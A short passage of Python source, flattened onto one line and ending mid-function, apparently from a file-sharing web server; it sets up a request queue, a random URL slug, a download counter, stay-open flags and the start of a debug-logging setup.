REQUEST_LOAD = 0 REQUEST_DOWNLOAD = 1 REQUEST_PROGRESS = 2 REQUEST_OTHER = 3 q = Queue.Queue() def add_request(type, path, data=None): global q q.put({ 'type': type, 'path': path, 'data': data }) slug = helpers.random_string(16) download_count = 0 stay_open = False def set_stay_open(new_stay_open): global stay_open stay_open = new_stay_open def get_stay_open(): return stay_open def debug_mode(): import logging if platform.system() == 'Windows': temp_dir = os.environ['Temp'].replace('\\', '/') else: